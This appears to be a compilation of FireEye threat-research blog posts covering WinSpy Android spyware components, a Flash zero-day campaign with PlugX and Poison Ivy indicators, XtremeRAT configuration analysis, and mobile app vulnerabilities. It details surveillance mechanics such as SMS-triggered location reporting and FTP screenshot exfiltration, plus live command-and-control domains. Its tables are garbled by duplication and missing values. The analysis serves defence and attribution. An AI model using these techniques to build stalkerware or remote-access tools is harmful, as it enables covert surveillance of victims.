In the process of investigating the Windows modules for WinSpy we also discovered various Android components that can be employed to engage in surveillance of a target. We have found three different applications that are a part of the surveillance package. One of the applications requires commandeering via a windows controller and requires physical access to the device while the other two applications can be deployed in a client-server model and allow remote access through a second Android device.

Figure 11 - Deployment Scenarios for Android Components

 Windows Physical Controller:

The Windows controller requires physical access to the device and allows the attacker to retrieve screenshots from the infected device. This component is designed to target a victim in physical proximity. The various options available in the Windows controller are shown in Figure 12 below.

Figure 12 - Windows Controller for Android Device


The functionality and structure of the components on the victim’s device are described below in detail.

Component 1 -  GlobalService.apk


          a. Services
                    Global Service
          b. Methods

Main activity

The app is started with an intent that is provided from the desktop android executable. The intent is a "" intent with the extra field of "interval" which holds a string of the form


The hostname, port, username, and password are used to connect to the attackers' FTP server to send screenshots, which is explained, in a later section. Once this intent is received the GlobalService is restarted with the interval parameter..


This service contains the following variables

         private static final String TAG = "GlobalService";
         private static boolean isScreenON;
         private int mInterval;
         private KeyguardManager mKeyGaurdManager;
         private BroadcastReceiver mPowerKeyReceiver;
         private Timer mSyncTimer;
         private TimerTask mSyncTimerTask;

It goes on to check the value of the isScreenON variable. If the screen is on and if the keyguard has been unlocked, it calls the startScreenCaptureThread() method.

The startScreenCaptureThread method sets the value of the mInterval variable to the value of interval passed to GlobalService. It also sets the properties of the mSyncTimerTask to point to the takeScreenshot method from the ScreenCapturer class such that the thread, when invoked, will take a screenshot every ‘interval’ number of seconds.

The takeScreenshot method in the ScreenCapturer class connects to a native service using a local socket. It connects to port 42345 on localhost. The native service, which is listening on the same port, accepts strings on the socket.

The takeScreenshot method sends a string of the form ‘/data/local/tmp/images/screenshot_DATE.png’ to the underlying native service. The native service checks for the string after the last trailing slash “/”, “screenshot” after the last trailing slash will cause the native service to take a screenshot by issuing the “screencap –p” method. The screenshot taken will be written to the path specified by the string passed as an argument.

The takeScreenshot method then returns the path of the image to the screenCaptureThread which calls the FTPService thereby uploading the screenshot to the attackers CnC server.

Component 2 - GlobalNativeService

The native services listens on a local socket for commands from the GlobalService.apk.

As seen above, if the string after the last trailing slash is “screenshot_” is sent to the Native service through the socket. It runs the command “screencap –p” on the shell of the device and captures a screenshot of the infected device.

The native service also implements other functionality such as deleting a file, saving FTP information to /data/local/tmp/ftpInformation.

If the string “GPSLocationInfo” is sent to the native service on the local socket, it creates GPSLocations.txt at /data/local/tmp/GPSLocations.txt but does not save the current GPS location. This perhaps indicates an upcoming feature.

Android Remote Controller

Component 1 - GPSTracker.apk 

The startup routine for the GPSTracker class is exactly the same as the one for GlobalService class. It gets the value from an "StartGPSTracker" intent which holds the value for an 'interval' variable as an integer. This app records the GPS location of the device at regular intervals (5 minutes). It records the location only if the previous location is 200 meters apart from the current location.

When a location has to be added to the database all previous locations are deleted. Therefore it only maintains the last known location.

This app monitors all incoming messages. If an SMS with "[gmyl]"(Short for (g)ive (m)e (y)our (l)ocation) at the beginning arrives on the device, the corresponding SMS_RECEIVED intent is aborted and the database is queried. A response SMS is crafted as shown below:


The string “himl” is short for (h)ere (i)s (m)y (l)ocation. Only the last known location is sent as a response to the user.

Component 2 - GPSTrackerClient.apk

This app acts as the controller to the GPSTracker.apk. While the GPSTracker.apk is installed on the victim's device, the GPSTrackerClient.apk is installed on the device from which the monitoring takes place. It takes the phone number of the phone to be tracked and sends it an SMS that contains "[gmyl]". The GPSTracker.apk then responds with the location in an SMS message as described in the above section. It then uses the native maps functionality, i.e., Google Maps, to point to the location sent by GPSTracker.

It is also worthwhile to note that the two modules do not authenticate each other by any means therefore it allows anyone infected with GPSTracker.apk to be controlled just by sending SMS messages with a given structure.


These attacks and tools reaffirm that we live in an age of digital surveillance and intellectual property theft. Off-the-shelf RATs have continued to proliferate over the years and attackers have continued to increasingly use these tools. With the widespread adoption of mobile platforms such as Android, a new market continues to emerge with the demand for RATs to support these platforms. We will continue to see more implementations of RATs and payloads to support multiple platforms and attackers will continue to take advantage of these new attack surfaces to infiltrate their targets.

The 2013 FireEye Advanced Threat Report!

FireEye has just released its 2013 Advanced Threat Report (ATR), which provides a high-level overview of the computer network attacks that FireEye discovered last year.

In this ATR, we focused almost exclusively on a small, but very important subset of our overall data analysis – the advanced persistent threat (APT).

APTs, due to their organizational structure, mission focus, and likely some level of nation-state support, often pose a more serious danger to enterprises than a lone hacker or hacker group ever could.

Over the long term, APTs are capable of cyber attacks that can rise to a strategic level, including widespread intellectual property theft, espionage, and attacks on national critical infrastructures.

The data contained in this report is gleaned from the FireEye Dynamic Threat Intelligence (DTI) cloud, and is based on attack metrics shared by FireEye customers around the world.

Its insight is derived from:

  • 39,504 cyber security incidents
  • 17,995 malware infections
  • 4,192 APT incidents
  • 22 million command and control (CnC) communications
  • 159 APT-associated malware families
  • CnC infrastructure in 206 countries and territories

FireEye 2013 Threat Report Final

Based on our data, the U.S., South Korea, and Canada were the top APT targets in 2013; the U.S., Canada, and Germany were targeted by the highest number of unique malware families.

The ATR describes attacks on 20+ industry verticals. Education, Finance, and High-Tech were the top overall targets, while Government, Services/Consulting, and High-Tech were targeted by the highest number of unique malware families.

In 2013, FireEye discovered eleven zero-day attacks. In the first half of the year, Java was the most common target for zero-days; in the second half, FireEye observed a surge in Internet Explorer (IE) zero-days that were used in watering hole attacks, including against U.S. government websites.

Last year, FireEye analyzed five times more Web-based security alerts than email-based alerts – possibly stemming from an increased awareness of spear phishing as well as a more widespread use of social media.

In sum, the 2013 ATR offers strong evidence that malware infections occur within enterprises at an alarming rate, that attacker infrastructure is global in scope, and that advanced attackers continue to penetrate legacy defenses, such as firewalls and anti-virus (AV), with ease.

Amazon’s Mobile Shopping Clients and CAPTCHA

Amazon is a popular online retailer serving millions of users. Unfortunately, FireEye mobile security researchers have found security issues within Amazon’s mobile apps on both Android and iOS platforms through which attackers can crack the passwords of target Amazon accounts. Amazon confirmed our findings and hot fixed the issue.

Recently, we found two security issues within Amazon’s mobile apps on both Android and iOS platforms:

  • No limitation or CAPTCHA for password attempts
  • Weak password policy

Attackers can exploit these two security issues remotely against target Amazon accounts.

fig1 Figure 1. Verification Code for Wrong Password Attempts

A CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart") is a challenge-response test designed to determine whether the user is a human. CAPTCHAs are well adopted for preventing programmed bots from accessing online services for bad purposes, such as conducting denial-of-service attacks, harvesting information and cracking passwords.

The web version of Amazon requires the user to complete a CAPTCHA after ten incorrect password attempts (Figure 1), to prevent password cracking. However, Amazon’s mobile apps haven’t adopted such protection using CAPTCHA (Figure 2 and Figure 3). This design flaw provides attackers the chance to crack any Amazon account’s password using brute force.

 fig2 Figure 2. Amazon Android App

fig3 Figure 3. Amazon iOS App

Furthermore, Amazon doesn’t have a strong password strength requirement. It accepts commonly used weak passwords such as "123456" and "111111". We know that the weaker the password, the easier for hackers to break into an account. Therefore, allowing weak passwords puts account safety to potential security risks. Given that there are many well-known previous password leakages, attackers can use these password leakages as knowledge bases to conduct password cracking.

As a proof of concept, we figured out the password of one Amazon account we setup within 1000 attempts, using the latest version (2.8.0) of Amazon’s Android shopping client.

After receiving our vulnerability report, Amazon hot fixed the first issue by patching their server. Now if the user tries multiple incorrect passwords, the server will block the user from login (Figure 4). In the future, we suggest adding CAPTCHA support for Amazon mobile (Android and iOS) apps, and enforcing requirements for stronger passwords.

fig4 Figure 4. Wrong Password Block

Background Monitoring on Non-Jailbroken iOS 7 Devices — and a Mitigation

Background monitoring mobile applications has become a hot topic on mobile devices. Existing reports show that such monitoring can be conducted on jailbroken iOS devices. FireEye mobile security researchers have discovered such vulnerability, and found approaches to bypass Apple's app review process effectively and exploit non-jailbroken iOS 7 successfully. We have been collaborating with Apple on this issue.


Fig.1 Background Monitoring

We have created a proof-of-concept "monitoring" app on non-jailbroken iOS 7.0.x devices. This “monitoring” app can record all the user touch/press events in the background, including, touches on the screen, home button press, volume button press, and TouchID press, and then this app can send all user events to any remote server, as shown in Fig.1. Potential attackers can use such information to reconstruct every character the victim inputs.

Note that the demo exploits the latest 7.0.4 version of iOS system on a non-jailbroken iPhone 5s device successfully. We have verified that the same vulnerability also exists in iOS versions 7.0.5, 7.0.6, and 6.1.x. Based on the findings, potential attackers can either use phishing to mislead the victim to install a malicious/vulnerable app or exploit another remote vulnerability of some app, and then conduct background monitoring.


Fig.2 Background App Refresh Settings


Fig.3 Killing An App on iOS7

iOS7 provides settings for "background app refresh". Disabling unnecessary app's background refreshing contributes to preventing the potential background monitoring. However, it can be bypassed. For example, an app can play music in the background without turning on its "background app refresh" switch. Thus a malicious app can disguise itself as a music app to conduct background monitoring.

Before Apple fixes this issue, the only way for iOS users to avoid this security risk is to use the iOS task manager to stop the apps from running in the background to prevent potential background monitoring. iOS7 users can press the Home button twice to enter the task manager and see preview screens of apps opened, and then swipe an app up and out of preview to disable unnecessary or suspicious applications running on the background, as shown in Fig.3.

We conducted this research independently before we were aware of this recent report. We hope this blog could help users understand and mitigate this threat further.

Acknowledgement: Special thanks to Jari Salomaa for his valuable comments and feedback. We also thank Raymond Wei, Dawn Song, and Zheng Bu for their valuable help on writing this blog.

Write Once, Exploit Everywhere: FireEye Report Analyzes Four Widely Exploited Java Vulnerabilities

Over the last couple of decades, Java has become the lingua franca of software development, a near-universal platform that works across different operating systems and devices. With its “write once, run anywhere” mantra, Java has drawn a horde of developers looking to serve a large user base as efficiently as possible.

Cyber attackers like Java for many of the same reasons. With a wide pool of potential targets, the platform has become the vehicle of choice for quickly dispersing lucrative crimeware packages.

In our continuing mission to equip security professionals against today’s advanced cyber threats, FireEye has published a free report, “Brewing Up Trouble: Analyzing Four Widely Exploited Java Vulnerabilities.” The report outlines four commonly exploited Java vulnerabilities and maps out the step-by-step infection flow of exploits kits that leverage them.

Download the paper to learn more about these vulnerabilities:

  • CVE-2013-2471, which allows attackers to override Java’s getNumDataElements() method, leading to memory corruption.
  • CVE-2013-2465,  which involves insufficient bounds checks in the storeImageArray() function. This vulnerability is used by White Lotus and other exploit kits.
  • CVE-2012-4681,  which allows attackers to bypass security checks using the findMethod () function.
  • CVE-2013-2423, which  arises due to insufficient validation in the findStaticSetter () method, leading to Java type confusion. This vulnerability employed by RedKit and other exploits kits.

As explained in the paper, Java’s popularity among the developers and widespread use in Web browsers all but  guarantees continuing interest from threat actors.

Motivated by the profits, cyber attackers are bound to adopt more intelligent exploit kits. And these attacks will continue to mushroom as more threat actors scramble for a piece of the crimeware pie.

Operation GreedyWonk: Multiple Economic and Foreign Policy Sites Compromised, Serving Up Flash Zero-Day Exploit

Less than a week after uncovering Operation SnowMan, the FireEye Dynamic Threat Intelligence cloud has identified another targeted attack campaign — this one exploiting a zero-day vulnerability in Flash. We are collaborating with Adobe security on this issue. Adobe has assigned the CVE identifier CVE-2014-0502 to this vulnerability and released a security bulletin.

As of this blog post, visitors to at least three nonprofit institutions — two of which focus on matters of national security and public policy — were redirected to an exploit server hosting the zero-day exploit. We’re dubbing this attack “Operation GreedyWonk.”

We believe GreedyWonk may be related to a May 2012 campaign outlined by ShadowServer, based on consistencies in tradecraft (particularly with the websites chosen for this strategic Web compromise), attack infrastructure, and malware configuration properties.

The group behind this campaign appears to have sufficient resources (such as access to zero-day exploits) and a determination to infect visitors to foreign and public policy websites. The threat actors likely sought to infect users to these sites for follow-on data theft, including information related to defense and public policy matters.


On Feb. 13, FireEye identified a zero-day Adobe Flash exploit that affects the latest version of the Flash Player ( and 11.7.700.261). Visitors to the Peter G. Peterson Institute for International Economics (www.piie[.]com) were redirected to an exploit server hosting this Flash zero-day through a hidden iframe.

We subsequently found that the American Research Center in Egypt (www.arce[.]org) and the Smith Richardson Foundation (www.srf[.]org) also redirected visitors the exploit server. All three organizations are nonprofit institutions; the Peterson Institute and Smith Richardson Foundation engage in national security and public policy issues.


To bypass Windows’ Address Space Layout Randomization (ASLR) protections, this exploit targets computers with any of the following configurations:

  • Windows XP
  • Windows 7 and Java 1.6
  • Windows 7 and an out-of-date version of Microsoft Office 2007 or 2010

Users can mitigate the threat by upgrading from Windows XP and updating Java and Office. If you have Java 1.6, update Java to the latest 1.7 version. If you are using an out-of-date Microsoft Office 2007 or 2010, update Microsoft Office to the latest version.

These mitigations do not patch the underlying vulnerability. But by breaking the exploit’s ASLR-bypass measures, they do prevent the current in-the-wild exploit from functioning.

Vulnerability analysis

GreedyWonk targets a previously unknown vulnerability in Adobe Flash. The vulnerability permits an attacker to overwrite the vftable pointer of a Flash object to redirect code execution.

ASLR bypass

The attack uses only known ASLR bypasses. Details of these techniques are available from our previous blog post on the subject (in the “Non-ASLR modules” section).

For Windows XP, the attackers build a return-oriented programming (ROP) chain of MSVCRT (Visual C runtime) gadgets with hard-coded base addresses for English (“en”) and Chinese (“zh-cn” and “zh-tw”).

On Windows 7, the attackers use a hard-coded ROP chain for MSVCR71.dll (Visual C++ runtime) if the user has Java 1.6, and a hard-coded ROP chain for HXDS.dll (Help Data Services Module) if the user has Microsoft Office 2007 or 2010.

Java 1.6 is no longer supported and does not receive security updates. In addition to the MSVCR71.dll ASLR bypass, a variety of widely exploited code-execution vulnerabilities exist in Java 1.6. That’s why FireEye strongly recommends upgrading to Java 1.7.

The Microsoft Office HXDS.dll ASLR bypass was patched at the end of 2013. More details about this bypass are addressed by Microsoft’s Security Bulletin MS13-106 and an accompanying blog entry. FireEye strongly recommends updating Microsoft Office 2007 and 2010 with the latest patches.

Shellcode analysis

The shellcode is downloaded in ActionScript as a GIF image. Once ROP marks the shellcode as executable using Windows’ VirtualProtect function, it downloads an executable via the InternetOpenURLA and InternetReadFile functions. Then it writes the file to disk with CreateFileA and WriteFile functions. Finally, it runs the file using the WinExec function.

PlugX/Kaba payload analysis

Once the exploit succeeds, a PlugX/Kaba remote access tool (RAT) payload with the MD5 hash 507aed81e3106da8c50efb3a045c5e2b is installed on the compromised endpoint. This PlugX sample was compiled on Feb. 12, one day before we first observed it, indicating that it was deployed specifically for this campaign.

This PlugX payload was configured with the following command-and-control (CnC) domains:

  • java.ns1[.]name
  • wmi.ns01[.]us

Sample callback traffic was as follows:

POST /D28419029043311C6F8BF9F5 HTTP/1.1

Accept: */*

HHV1: 0

HHV2: 0

HHV3: 61456

HHV4: 1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; SV1)


Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache

Campaign analysis

Both java.ns1[.]name and[.]org resolved to on Feb. 18, 2014. Passive DNS analysis reveals that the domain previously resolved to between July 4, 2013 and July 15, 2013 and on Feb. 17, 2014.  java.ns1[.]name also resolved to on February 18.

Domain First Seen Last Seen IP Address[.]org[.]org 2014-02-18 2014-02-18 2014-02-19 2014-02-19
java.ns1[.]name java.ns1[.]name 2014-02-18 2014-02-18 2014-02-19 2014-02-19
java.ns1[.]name java.ns1[.]name 2014-02-18 2014-02-18 2014-02-18 2014-02-18
wmi.ns01[.]us wmi.ns01[.]us 2014-02-17 2014-02-17 2014-02-17 2014-02-17
proxy.ddns[.]info proxy.ddns[.]info 2013-05-02 2013-05-02 2014-02-18 2014-02-18
updatedns.ns02[.]us updatedns.ns02[.]us 2013-09-06 2013-09-06 2013-09-06 2013-09-06
updatedns.ns01[.]us updatedns.ns01[.]us 2013-09-06 2013-09-06 2013-09-06 2013-09-06
wmi.ns01[.]us wmi.ns01[.]us 2013-07-04 2013-07-04 2013-07-15 2013-07-15


MD5 Family Compile Time Alternate C2s
7995a9a6a889b914e208eb924e459ebc 7995a9a6a889b914e208eb924e459ebc PlugX PlugX 2012-06-09 2012-06-09 fuckchina.govnb[.]com fuckchina.govnb[.]com
bf60b8d26bc0c94dda2e3471de6ec977 bf60b8d26bc0c94dda2e3471de6ec977 PlugX PlugX 2010-03-15 2010-03-15[.]org[.]org
fd69793bd63c44bbb22f9c4d46873252 fd69793bd63c44bbb22f9c4d46873252 Poison Ivy Poison Ivy 2013-03-07 2013-03-07 N/A N/A
88b375e3b5c50a3e6c881bc96c926928 88b375e3b5c50a3e6c881bc96c926928 Poison Ivy Poison Ivy 2012-06-11 2012-06-11 N/A N/A
cd07a9e49b1f909e1bd9e39a7a6e56b4 cd07a9e49b1f909e1bd9e39a7a6e56b4 Poison Ivy Poison Ivy 2012-06-11 2012-06-11 N/A N/A

The Poison Ivy variants that connected to the domain wmi.ns01[.]us had the following unique configuration properties:

Domain First Seen Last Seen IP Address
fuckchina.govnb[.]com fuckchina.govnb[.]com 2013-12-11 2013-12-11 2013-12-11 2013-12-11[.]org[.]org 2014-02-12 2014-02-12 2014-02-12 2014-02-12[.]org[.]org 2013-12-04 2013-12-04 2013-12-04 2013-12-04

We found a related Poison Ivy sample (MD5 8936c87a08ffa56d19fdb87588e35952) with the same “java7” password, which was dropped by an Adobe Flash exploit (CVE-2012-0779). In this previous incident, visitors to the Center for Defense Information website (www.cdi[.]org — also an organization involved in defense matters — were redirected to an exploit server at

This exploit server hosted a Flash exploit file named BrightBalls.swf (MD5 1ec5141051776ec9092db92050192758). This exploit, in turn, dropped the Poison Ivy variant. In addition to using the same password “java7,” this variant was configured with the mutex with the similar pattern of “YFds*&^ff” and connected to a CnC server at windows.ddns[.]us.

Using passive DNS analysis, we see the domains windows.ddns[.]us and wmi.ns01[.]us both resolved to in mid-2012.

Domain First Seen Last Seen IP Address 2012-07-07 2012-07-07 2012-09-19 2012-09-19 2012-05-23 2012-05-23 2012-06-10 2012-06-10

During another earlier compromise of the same website, visitors were redirected to a Java exploit test.jar (MD5 7d810e3564c4eb95bcb3d11ce191208e). This jar file exploited CVE-2012-0507 and dropped a Poison Ivy payload with the hash (MD5 52aa791a524b61b129344f10b4712f52). This Poison Ivy variant connected to a CnC server at ids.ns01[.]us. The domain ids.ns01[.]us also overlaps with the domain wmi.ns01[.]us on the IP

Domain First Seen Last Seen IP Address
wmi.ns01[.]us wmi.ns01[.]us 2012-07-03 2012-07-03 2012-07-04 2012-07-04
ids.ns01[.]us ids.ns01[.]us 2012-04-23 2012-04-23 2012-05-18 2012-05-18

The Poison Ivy sample referenced above (MD5 fd69793bd63c44bbb22f9c4d46873252) was delivered via an exploit chain that began with a redirect from the Center for European Policy Studies (www.ceps[.]be). In this case, visitors were redirected from www.ceps[.]be to a Java exploit hosted on shop.fujifilm[.]be.

In what is certainly not a coincidence, we also observed www.arce[.]org (one of the sites redirecting to the current Flash exploit) also redirect visitors to the Java exploit on shop.fujifilm[.]be in 2013.



This threat actor clearly seeks out and compromises websites of organizations related to international security policy, defense topics, and other non-profit sociocultural issues. The actor either maintains persistence on these sites for extended periods of time or is able to re-compromise them periodically.

This actor also has early access to a number of zero-day exploits, including Flash and Java, and deploys a variety of malware families on compromised systems. Based on these and other observations, we conclude that this actor has the tradecraft abilities and resources to remain a credible threat in at least the mid-term.

XtremeRAT: Nuisance or Threat?

Rather than building custom malware, many threat actors behind targeted attacks use publicly or commercially available remote access Trojans (RATs). This pre-built malware has all the functionality needed to conduct cyber espionage and is controlled directly by humans, who have the ability to adapt to network defenses. As a result, the threat posed by these RATs should not be underestimated.

However, it is difficult to distinguish and correlate the activity of targeted threat actors based solely on their preference to use particular malware — especially, freely available malware. From an analyst’s perspective, it is unclear whether these actors choose to use this type of malware simply out of convenience or in a deliberate effort to blend in with traditional cybercrime groups, who also use these same tools.

There are numerous RATs available for free and for purchase in online forums, chat rooms and market places on the Internet. Most RATs are easy to use and thus attract novices. They are used for a variety of criminal activity, including “sextortion”. [1] The ubiquity of these RATs makes it difficult to determine if a particular security incident is related to a targeted threat, cybercrime or just a novice “script kiddie” causing a nuisance.

Although publicly available RATs are used by a variety of operators with different intents, the activity of particular threat actors can still be tracked by clustering command and control server information as well as the information that is set by the operators in the builder. These technical indicators, combined with context of an incident (such as the timing, specificity and human activity) allow analysts to assess the targeted or non-targeted nature of the threat.

In this post, we examine a publicly available RAT known as XtremeRAT. This malware has been used in targeted attacks as well as traditional cybercrime. During our investigation we found that the majority of XtremeRAT activity is associated with spam campaigns that typically distribute Zeus variants and other banking-focused malware. Why have these traditional cybercrime operators begun to distribute RATs? This seems odd, considering RATs require manual labor as opposed to automated banking Trojans.

Based on our observations we propose one or more of the following possible explanations:

  1. Smokescreen
    The operations may be part of a targeted attack that seeks to disguise itself and its possible targets, by using spam services to launch the attacks.
  2. Less traditional tools available
    With more crimeware author arrests and/or disappearance of a number of banking Trojan developers, cybercriminals are resorting to using RATs to manually steal data, such as banking and credit card details. [2]
  3. Complicated defenses require more versatile tools
    As many traditional banking and financial institutions have improved their security practices, perhaps attackers have had a much more difficult time developing automation in their Trojans to cover all variations of these defenses; as such, RATs provide more versatility and effectiveness, at the expense of scalability.
  4. Casting a wider net
    After compromising indiscriminate targets, attackers may dig deeper into specific targets of interest and/or sell off the access rights of the victims’ systems and their data to others.

These possible explanations are not mutually exclusive. One or all of them may be factors in explaining this observed activity.


The XtremeRAT was developed by “xtremecoder” and has been available since at least 2010.  Written in Delphi, the code of XtremeRAT is shared amongst several other Delphi RAT projects including SpyNet, CyberGate, and Cerberus. The RAT is available for free; however, the developer charges 350 Euros for the source code.  Unfortunately for xtremecoder, the source code has been leaked online.  The current version is Xtreme 3.6, however, there are a variety of “private” version of this RAT available as well. As such, the official version of this RAT and its many variants are used by a wide variety of actors.

XtremeRAT allows an attacker to:

  • Interact with the victim via a remote shell
  • Upload/download files
  • Interact with the registry
  • Manipulate running processes and services
  • Capture images of the desktop
  • Record from connected devices, such as a webcam or microphone

Moreover, during the build process, the attacker can specify whether to include keylogging and USB infection functions.

Extracting Intelligence

XtremeRAT contains two components: a “client” and a “server”; however, from the attacker’s perspective, these terms have reversed meanings. Specifically, according to the author, the “server” component is the malware that resides on victim endpoints that connect to the “client”, which is operated by the attacker from one or more remote command-and-control (CnC) systems. Due to this confusing and overloaded terminology, we refer to the “server” as a “backdoor” on the victim and the “client” as a remote “controller” operated by the attacker.

XtremeRAT backdoors maintain and reference configuration data that was chosen by the attacker at the time they were built. This data can contain very useful hints to help group attacks and attribute them to actors, similar to what we have previously described in our Poison Ivy whitepaper. [3]

Several versions of XtremeRAT write this configuration data to disk under %APPDATA%\Microsoft\Windows, either directly, or to a directory named after mutex configured by the attacker. When written to disk, the data is RC4 encrypted with a key of either "CYBERGATEPASS" or "CONFIG" for the versions we have analyzed. In both cases, the key is Unicode. The config file has either a “.nfo” or ".cfg" extension depending on the version. XtremeRAT's key scheduling algorithm (KSA) implementation contains a bug wherein it only considers the length of the key string, not including the null bytes between each character, as is found in these Unicode strings. As a result, it only effectively uses the first half of the key. For example, the key “C\x00O\x00N\x00F\x00I\x00G\x00” is 12 bytes long, but the length is calculated as only being 6 bytes long. Because of this, the key that is ultimately used is “C\x00O\x00N\x00”.

The configuration data includes:

  • Name of the installed backdoor file
  • Directory under which the backdoor file is installed
  • Which process it will inject into (if specified)
  • CnC information
  • FTP information for sending stolen keystroke data to
  • Mutex name of the master process,
  • ID and group name which are used by the actors for organizational purposes

Because the decrypted configuration data can be reliably located in memory (with only slight variations in its structure from version to version) and because not all versions of XtremeRAT will write their configuration data to disk, parsing memory dumps of infected systems is often the ideal method for extracting intelligence.

We are releasing python scripts we have developed to gather the configuration details for various versions of XtremeRAT from both process memory dumps and the encrypted configuration file on disk. The scripts are available at

Also included in this toolset is a script that decrypts and prints the contents of the log file created by XtremeRAT containing victim keystroke data. This log file is written to the same directory as the config file and has a “.dat” extension. Curiously, this log file is encrypted with a simple two-byte XOR instead of RC4. Later in this blog, we will share some of the configuration details we have extracted during our subsequent analysis.

XtremeRAT Activity

Using telemetry from the FireEye Dynamic Threat Intelligence (DTI) cloud, we examined 165 XtremeRAT samples from attacks that primarily hit the following sectors:

  • Energy, utilities, and petroleum refining
  • Financial Services
  • High-tech

These incidents include a spectrum of attacks including targeted attacks as well as indiscriminate attacks. Among these XtremeRAT-based attacks, we found that 4 of the 165 samples were used in targeted attacks against the High-Tech sector by threat actors we have called “MoleRats”. [4]

Operation Molerats

In 2012, XtremeRAT was used against a variety of governments as well as Israeli and Palestinian targets in what was known as Operation Molerats (the same attackers have also used variants of the Poison Ivy RAT). [5] Upon executing one particular sample (45142b17abd8a17a5e38305b718f3415), the malware beacons to “” and “”. In this particular case, the attacker used XtremeRAT 2.9 within a self-extracting archive that also presents a decoy document to the victim, where the decoy content appears to have been copied from a website.

[caption id="attachment_4467" align="alignnone" width="849"] Figure 1. Contents of SFX archive containing XtremeRAT
Figure 1. Contents of SFX archive containing XtremeRAT[/caption]

[caption id="attachment_4470" align="alignnone" width="623"]Figure 2. SFX settings inside malicious archive Figure 2. SFX settings inside malicious archive[/caption]

[caption id="attachment_4472" align="alignnone" width="675"]Figure 3. Decoy content presented in malicious archive Figure 3. Decoy content presented in malicious archive[/caption]

Figure 4 shows the controller the attacker uses to interact with systems compromised with XtremeRAT. In this case, it appears the actor used the ID field to record the type of attack delivered (docx) and the Group field was used to record a “campaign code” (IDF), which helps the actor keep track of the set of victims that were attacked during this campaign.

[caption id="attachment_4474" align="alignnone" width="900"]Figure 4. XtremeRAT controller GUI Figure 4. XtremeRAT controller GUI[/caption]

The attacker modified the highlighted information at build time. By default, the XtremeRAT controller sets the ID field as “Server” and Group field as “Servers”, with the default password used to authenticate, connect, and control a compromised endpoint as “1234567890”.

[caption id="attachment_4475" align="alignnone" width="900"]Figure 5. XtremeRAT controller connection settings Figure 5. XtremeRAT controller connection settings[/caption]

In the Figure 5, the attacker specified custom CnC servers and ports and changed the default password to “1411”. The attacker also changed the default process mutex name.

[caption id="attachment_4476" align="alignnone" width="900"]Figure 6. XtremeRat install settings Figure 6. XtremeRat install settings[/caption]

By default, the controller assigns a process mutex name of is “--((Mutex))--” and the attackers changed it to “fdgdfdg”. These indicators along with command and control domain names and the IP addresses that they resolve to can be used to cluster and track this activity over time.

[caption id="attachment_4477" align="alignnone" width="900"]Figure 7. Molerats cluster analysis Figure 7. Molerats cluster analysis[/caption]

This is a cluster of Molerats activity. In addition to using the password “1411”, the attackers are also using the password “12345000”. This is a simple way to track the activity of these actors by using both passive DNS data and configuration information extracted from XtremeRAT.

Spam Activity

The vast majority of XtremeRAT activity clustered around the default password “1234567890” (116 samples). There was overlap between this large cluster and the second largest one which used the password “123456” (12 samples). The activity in these two clusters aligns with indicators observed in Spanish language spam runs. The “123456” cluster also contains spam in the English language, leveraging the recent tragedy in Kenya as a lure. [7]

The Uranio Cluster

In our sample set, we have 28 malware samples that connect to a set of sequentially numbered command and control servers:


The malware is being spammed out and has file names such as:

  • Certificaciones De Pagos Nominas Parafiscales jpg 125420215 58644745574455 .exe
  • Soportes de pagos  certificaciones y documentos mes mayo 30 2013 567888885432235678888888123456.exe
  • Certificaciones De Pago Y Para Fiscales.exe

We extracted the configurations for a sampling of the XtremeRAT samples we came across in this spam run and found the following results:

MD5 ID Group Version Mutex
a6135a6a6346a460792ce2da285778b1 a6135a6a6346a460792ce2da285778b1 ABRIL ABRIL CmetaS3 CmetaS3 3.6 Private 3.6 Private C5AapWKh C5AapWKh
988babfeec5111d45d7d7eddea6daf28 988babfeec5111d45d7d7eddea6daf28 ABRIL ABRIL CmetaS3 CmetaS3 3.6 Private 3.6 Private C5AapWKh C5AapWKh
715f54a077802a0d67e6e7136bcbe340 715f54a077802a0d67e6e7136bcbe340 ABRIL ABRIL CmetaS3 CmetaS3 3.6 Private 3.6 Private C5AapWKh C5AapWKh
167496763aa8d369ff482c4e2ca3da7d 167496763aa8d369ff482c4e2ca3da7d ABRIL ABRIL CmetaS3 CmetaS3 3.6 Private 3.6 Private C5AapWKh C5AapWKh
3f288dfa95d90a3cb4503dc5f3d49c16 3f288dfa95d90a3cb4503dc5f3d49c16 Server Server Cometa4 Cometa4 3.6 Private 3.6 Private 4QtgfoP 4QtgfoP
6a8057322e62c569924ea034508068c9 6a8057322e62c569924ea034508068c9 Server Server Platino4 Platino4 3.6 Private 3.6 Private mbojnXS mbojnXS
37b90673aa83d177767d6289c4b90468 37b90673aa83d177767d6289c4b90468 Server Server Platino4 Platino4 3.6 Private 3.6 Private mbojnXS mbojnXS
98fb1014f6e90290da946fdbca583334 98fb1014f6e90290da946fdbca583334 Server Server Platino8 Platino8 3.6 Private 3.6 Private G7fjZQYAH G7fjZQYAH
5a9547b727f0b4baf9b379328c797005 5a9547b727f0b4baf9b379328c797005 Server Server Platino8 Platino8 3.6 Private 3.6 Private G7fjZQYAH G7fjZQYAH
fb98c8406e316efb0f46024f7c6a6739 fb98c8406e316efb0f46024f7c6a6739 Server Server Platino9 Platino9 3.6 Private 3.6 Private kUHwdc8Y kUHwdc8Y
64f6f819a029956b8aeafb729512b460 64f6f819a029956b8aeafb729512b460 Server Server Uranio Uranio 3.6 Private 3.6 Private eYwJ6QX0i eYwJ6QX0i
a4c47256a7159f9556375c603647f4c2 a4c47256a7159f9556375c603647f4c2 Mayo Mayo Uranio2011 Uranio2011 3.6 Private 3.6 Private 0pg6ooH 0pg6ooH
62d6e190dcc23e838e11f449c8f9b723 62d6e190dcc23e838e11f449c8f9b723 Mayo Mayo Uranio2011 Uranio2011 3.6 Private 3.6 Private 0pg6ooH 0pg6ooH
d5d99497ebb72f574c9429ecd388a019 d5d99497ebb72f574c9429ecd388a019 Mayo Mayo Uranio2011 Uranio2011 3.6 Private 3.6 Private 0pg6ooH 0pg6ooH
3a9237deaf25851f2511e355f8c506d7 3a9237deaf25851f2511e355f8c506d7 Server Server Uranio3 Uranio3 QwcgY0a QwcgY0a
c5e95336d52f94772cbdb2a37cef1d33 c5e95336d52f94772cbdb2a37cef1d33 Server Server Uranio3 Uranio3 QwcgY0a QwcgY0a
0ea60a5d4c8c629c98726cd3985b63c8 0ea60a5d4c8c629c98726cd3985b63c8 Server Server Uranio4 Uranio4 xjUfrQHP6Xy xjUfrQHP6Xy
